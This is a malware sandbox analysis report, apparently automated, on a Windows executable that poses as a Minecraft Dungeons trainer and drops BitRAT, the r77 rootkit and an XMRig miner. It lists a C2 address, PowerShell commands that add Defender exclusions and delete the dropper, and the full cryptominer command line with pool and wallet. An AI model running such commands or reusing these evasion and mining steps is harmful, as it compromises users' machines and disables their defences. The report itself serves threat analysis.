Overview

overview

10

Static

static

62451199b2...28.exe

windows7_x64

1

62451199b2...28.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    162s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    10/03/2022, 13:31

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

  • Size

    5.1MB

  • MD5

    2394239524d152a87311e91311ab0abb

  • SHA1

    784942496518b70fce9b81d5e85c2ea95bb0c89b

  • SHA256

    62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128

  • SHA512

    d75ca0028286079fc592f0704077cdebcde4f9c55a11350df521d70a97169a12aef2275be8cd408132620f418f9f5c5833bf6b21e837615f80f3afb193a01bb6

Score
10/10
bitratr77xmrigminerpersistencerootkittrojan

Malware Config

Extracted

Family

bitrat

Version

1.35

C2

gumerez.xyz:1991

Attributes
  • communication_password

    c3e91d7657b11293c58a2efd9aa9262d

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • r77

    r77 is an open-source, userland rootkit.

    rootkitr77
  • r77 rootkit payload 2 IoCs

    Detects the payload of the r77 rootkit.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
    "C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3768
    • C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
      C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
      2⤵
        PID:1488
      • C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
        C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
        2⤵
          PID:648
        • C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
          C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:428
          • C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
            "C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
            "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"
            3⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of SetThreadContext
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2180
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1848
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MicrosoftSecurity\MicrosoftSecurity.exe'
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3052
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe" -Force
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:768
            • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
              C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3004
          • C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
            "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"
            3⤵
            • Modifies WinLogon for persistence
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of SetThreadContext
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3632
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rtizxvdftafqcz.vbs"
              4⤵
              • Checks computer location settings
              PID:1696
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowUpdate.exe'
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3836
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe" -Force
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1624
            • C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
              C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3032
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=484hzHaCUfmXhMq4nCE1wcFuQ1TVa8BPjdq5oYseNQHoDWQXS8of2U9VLnQ1cL7TVzbRVyY1Su76CAdcDdHxjXrbRbec8LG.rig1/pandalord143 --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
                5⤵
                  PID:3368
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 3368 -s 292
                    6⤵
                    • Program crash
                    PID:684
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 3368 -s 296
                    6⤵
                    • Program crash
                    PID:4048
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 356 -p 3368 -ip 3368
          1⤵
            PID:2608
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 472 -p 3368 -ip 3368
            1⤵
              PID:4068

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/428-135-0x0000000000400000-0x00000000009D6000-memory.dmp

              Filesize

              5.8MB

              Download

            • memory/428-136-0x0000000074580000-0x0000000074D30000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/768-214-0x00000000085C0000-0x00000000085DE000-memory.dmp

              Filesize

              120KB

              Download

            • memory/768-176-0x0000000074580000-0x0000000074D30000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/768-175-0x0000000004CB0000-0x0000000004CE6000-memory.dmp

              Filesize

              216KB

              Download

            • memory/768-215-0x0000000004CF5000-0x0000000004CF7000-memory.dmp

              Filesize

              8KB

              Download

            • memory/768-212-0x0000000008000000-0x0000000008066000-memory.dmp

              Filesize

              408KB

              Download

            • memory/768-210-0x0000000007F90000-0x0000000007FF6000-memory.dmp

              Filesize

              408KB

              Download

            • memory/768-193-0x0000000007730000-0x0000000007D58000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/768-178-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/768-177-0x0000000004CF2000-0x0000000004CF3000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1624-159-0x0000025604B10000-0x0000025604B32000-memory.dmp

              Filesize

              136KB

              Download

            • memory/1624-162-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/1624-163-0x00000256030A0000-0x00000256030A2000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1624-164-0x00000256030A3000-0x00000256030A5000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1624-165-0x00000256030A6000-0x00000256030A8000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1984-147-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/1984-201-0x00000155D44BA000-0x00000155D44BF000-memory.dmp

              Filesize

              20KB

              Download

            • memory/1984-200-0x00000155D44B8000-0x00000155D44BA000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1984-196-0x00000155D44B7000-0x00000155D44B8000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1984-150-0x00000155D44B0000-0x00000155D44B2000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1984-148-0x00000155D44B3000-0x00000155D44B5000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1984-149-0x00000155D44B6000-0x00000155D44B7000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2180-152-0x0000000004B60000-0x0000000004B61000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2180-145-0x0000000074580000-0x0000000074D30000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/2180-141-0x0000000000010000-0x000000000020E000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/3004-166-0x0000000000400000-0x00000000007CE000-memory.dmp

              Filesize

              3.8MB

              Download

            • memory/3004-168-0x0000000000400000-0x00000000007CE000-memory.dmp

              Filesize

              3.8MB

              Download

            • memory/3004-169-0x0000000000400000-0x00000000007CE000-memory.dmp

              Filesize

              3.8MB

              Download

            • memory/3032-172-0x0000000140000000-0x000000014021E000-memory.dmp

              Filesize

              2.1MB

              Download

            • memory/3032-184-0x0000016C9AE80000-0x0000016C9AE82000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3032-185-0x0000016C9AEB0000-0x0000016C9AEC2000-memory.dmp

              Filesize

              72KB

              Download

            • memory/3032-179-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3052-197-0x0000000074580000-0x0000000074D30000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3052-204-0x0000000006CA0000-0x0000000006CC2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/3052-198-0x0000000006750000-0x0000000006751000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3052-199-0x0000000006752000-0x0000000006753000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3052-211-0x00000000075F0000-0x0000000007656000-memory.dmp

              Filesize

              408KB

              Download

            • memory/3052-216-0x0000000006755000-0x0000000006757000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3368-206-0x0000000140000000-0x0000000140758000-memory.dmp

              Filesize

              7.3MB

              Download

            • memory/3368-205-0x0000000140000000-0x0000000140758000-memory.dmp

              Filesize

              7.3MB

              Download

            • memory/3368-203-0x0000000140000000-0x0000000140758000-memory.dmp

              Filesize

              7.3MB

              Download

            • memory/3632-146-0x0000000000D70000-0x0000000000FCA000-memory.dmp

              Filesize

              2.4MB

              Download

            • memory/3632-153-0x00000000018F0000-0x00000000018F2000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3632-151-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3768-130-0x0000000074580000-0x0000000074D30000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3768-134-0x00000000076C0000-0x0000000007752000-memory.dmp

              Filesize

              584KB

              Download

            • memory/3768-133-0x0000000007B80000-0x0000000008124000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/3768-132-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3768-131-0x0000000000D30000-0x0000000001252000-memory.dmp

              Filesize

              5.1MB

              Download

            • memory/3836-202-0x0000024EA2E08000-0x0000024EA2E09000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3836-192-0x0000024EA2E06000-0x0000024EA2E08000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3836-188-0x0000024EA2E03000-0x0000024EA2E05000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3836-186-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3836-187-0x0000024EA2E00000-0x0000024EA2E02000-memory.dmp

              Filesize

              8KB

              Download